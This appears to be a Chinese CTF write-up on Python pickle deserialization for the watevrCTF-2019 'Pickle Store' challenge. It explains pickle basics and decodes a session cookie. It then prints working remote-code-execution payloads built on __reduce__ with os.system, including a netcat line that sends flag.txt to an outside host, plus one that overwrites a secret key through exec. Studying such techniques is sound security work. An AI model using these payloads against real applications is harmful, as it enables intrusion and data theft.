从watevrCTF-2019:Pickle Store中学习python之pickle序列化漏洞

pickle提供了一个简单的持久化功能。可以将对象以文件的形式存放在磁盘上。

其本质是Pickling将Python对象层次结构转换为字节流的过程, unpickling是反向操作,从而将字节流(来自二进制文件或类似字节的对象)转换回对象层次结构。pickle模块对于错误或恶意构造的数据是不安全的。

pickle模块只能在python中使用,python中几乎所有的数据类型(列表,字典,集合,类等)都可以用pickle来序列化,

pickle序列化对象
  1. pickle.dumpobjfileprotocol = None,*,fix_imports = True

在此处将obj对象的编码pickle编码表示写入到文件对象中

pickle反序列化对象
  1. pickle.load(file)
关于cPickle

cPickle可以对任意一种类型的python对象进行序列化操作,比如list,dict,甚至是一个类的对象等。

关于pickle与cpickle的关系:cPickle – A faster pickle。

序列化:

  1. >>> data_string = cPickle.dumps(data) //将python对象序列化保存到一个字符串变量中

反序列化:

  1. >>> data = cPickle.loads(data_string)

一段理解样本:

  1. #coding:utf-8
  2. import pickle
  4. dict1 = dict(name='admin',
  5.              age=1000,
  6.              sex='?',
  7.              addr='japan',
  8.            )
  9. # print(dict1)
  10. data_dumps = pickle.dumps(dict1)
  11. print(
  12.     data_dumps)  
  14. print(type(data_dumps))  # <class 'bytes'>
  15. data = pickle.loads(data_dumps)  # 从字节对象中读取被封装的对象,并返回
  16. print(data)

output:

  1. b'\x80\x04\x95?\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04name\x94\x8c\x0c\xe5\x85\xab\xe5\xb2\x90\xe5\xa4\xa7\xe8\x9b\x87\x94\x8c\x03age\x94M\xe8\x03\x8c\x03sex\x94\x8c\x03\xef\xbc\x9f\x94\x8c\x04addr\x94\x8c\x05japan\x94u.'
  2. <class 'bytes'>
  3. {'name': 'admin', 'age': 1000, 'sex': '?', 'addr': 'japan'}

关于被序列化的数据的看法:

可以看一下此链接:

https://www.secshi.com/39791.html

[watevrCTF-2019]Pickle Store

这道题里就是python的反序列化了:

截取到session进行解密:

  1. import pickle
  2. import base64
  4. result = pickle.loads(base64.b64decode(b'gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAMmE0MDIxOTA4NmI0YTk1MDNkYWNkNjc1OTRlODg1NjhxBXUu'))
  5. print(result)

output:

  1. {'money': 500, 'history': [], 'anti_tamper_hmac': '2a40219086b4a9503dacd67594e88568'}

利用pickle及逆行序列化 poc:

  1. import pickle as cPickle
  2. import sys
  3. import base64
  5. COMMAND = sys.argv[1]
  7. class PickleRce(object):
  8.     def __reduce__(self):
  9.         import os
  10.         return (os.system,(COMMAND,))
  12. print base64.b64encode(cPickle.dumps(PickleRce()))

poc2:

  1. import pickle
  2. import base64
  3. import os
  4. class A(object):
  5.     def __reduce__(self):
  6.            return (os.system,('nc ip xxxx  < flag.txt',))
  7. a = A()
  8. print(base64.b64encode(pickle.dumps(a)))
覆盖密钥
  1. import pickle
  3. key = b'11111111111111111111111111111111'
  4. class A(object):
  5.     def __reduce__(self):
  6.         return (exec,("global key;key=b'66666666666666666666666666666666'",))
  8. a = A()
  9. pickle_a = pickle.dumps(a)
  10. print(pickle_a)
  11. pickle.loads(pickle_a)
  12. print(key)

从watevrCTF-2019:Pickle Store中学习python之pickle序列化漏洞的更多相关文章

  1. 从requests源码分析中学习python(一)

    v2ex同步更新:https://www.v2ex.com/t/500081 微信公众号:python学习开发 分析源码,看大神的代码是一种学习的好方法,让我从中学到很多以前不知道的知识,这次打算从大 ...

  2. pickle和cPickle:Python对象的序列化(上)

    https://segmentfault.com/a/1190000002493548 pickle模块实现了一种算法,将任意一个Python对象转化成一系列字节(byets).此过程也调用了seri ...

  3. (数据科学学习手札142)dill:Python中增强版的pickle

    本文示例代码已上传至我的Github仓库https://github.com/CNFeffery/DataScienceStudyNotes 1 简介 大家好我是费老师,相信不少读者朋友们都在Pyth ...

  4. python学习_应用pickle模块封装和拆封数据对象

    学习文件数据处理的时候了解到有pickle模块,查找官方文档学习了一些需要用到的pickle内容. 封装是一个将Python数据对象转化为字节流的过程,拆封是封装的逆操作,将字节文件或字节对象中的字节 ...

  5. Comprehensive learning path – Data Science in Python深入学习路径-使用python数据中学习

    http://blog.csdn.net/pipisorry/article/details/44245575 关于怎么学习python,并将python用于数据科学.数据分析.机器学习中的一篇非常好 ...

  6. Python中模块json与pickle的功能介绍

    json & pickle & shelve 1. json的序列化与反序列化 json的使用需要导入该模块,一般使用import json即可. json的序列化 方法1:json. ...

  7. python pickle模块的使用/将python数据对象序列化保存到文件中

    # Python 使用pickle/cPickle模块进行数据的序列化 """Python序列化的概念很简单.内存里面有一个数据结构, 你希望将它保存下来,重用,或者发送 ...

  8. Python:pickle模块学习

    1. pickle模块的作用 将字典.列表.字符串等对象进行持久化,存储到磁盘上,方便以后使用 2. pickle对象串行化 pickle模块将任意一个python对象转换成一系统字节的这个操作过程叫 ...

  9. python学习之文件读写,序列化(json,pickle,shelve)

    python基础 文件读写 凡是读写文件,所有格式类型都是字符串形式传输 只读模式(默认) r  f=open('a.txt','r')#文件不存在会报错 print(f.read())#获取到文件所 ...

随机推荐

  1. 仿京东BOE官网图片链接

  2. WordCount (Python)

    Github项目地址:https://github.com/w1036933220/WordCount 一.解题思路 把项目需求理清楚,画一个思维导图 考虑各部分功能所需要的大概实现思路 然后完成了计 ...

  3. 小程序 RecorderManager计时不准确问题

    官方文档:RecorderManager 录音管理器,内部实现计时不准确.有以下俩个问题: 点击暂停继续,当录音结束时,stop返回的时间包含了暂停的那一段时间. 正常录音,录音文件的时长有概率少个1 ...

  4. 消息型中间件之RabbitMQ集群

    在上一篇博客中我们简单的介绍了下rabbitmq简介,安装配置相关指令的说明以及rabbitmqctl的相关子命令的说明:回顾请参考https://www.cnblogs.com/qiuhom-187 ...

  5. LR与LR?

    目录 逻辑回归与线性回归 逻辑回归 1.建立目标函数 2. 梯度求解 3. 实现 线性回归 1. 建立目标函数 2. 求解 3. 实现 逻辑回归与交叉熵 逻辑回归与线性回归 逻辑回归 线性回归 目标函 ...

  6. 图解JAVA容器核心类库

    JAVA容器详解 类继承结构图 HashMap 1. 对象的HashCode是用来在散列存储结构中确定对象的存储地址的.   2. 如果两个对象的HashCode相同,即在数组中的地址相同.而数组的元 ...

  7. Spine学习二 -播放Spine动画

    要想播放一个Spine动画,必须要在一个物体上绑定一个Spine播放的组件,这里暂时使用SkeletonAnimation组件. 然后就是编写动画的控制脚本. 这里提一个特性: [SpineAnima ...

  8. 【HttpRunner v3.x】笔记 ——4. 测试用例-结构解析

    一.官方首推pytest格式 上篇文章我们知道了,httprunner可以支持三种格式的用例,分别是pytest.yaml和json.yaml和json是以前的版本所使用的用例格式,但是在3.x版本上 ...

  9. for、forEach、map、for...in、for...of的区别以及能否终止循环的总结

    有时候面试会提到,用的时候又不在意,今天有空挨个做了测试,总结如下:

  10. 04router

    1.以 / 开头的嵌套路径会被当作根路径.一级路由可以放在二级router-view里面 实现的效果是页面嵌套 { path: '/console', name: 'console', compone ...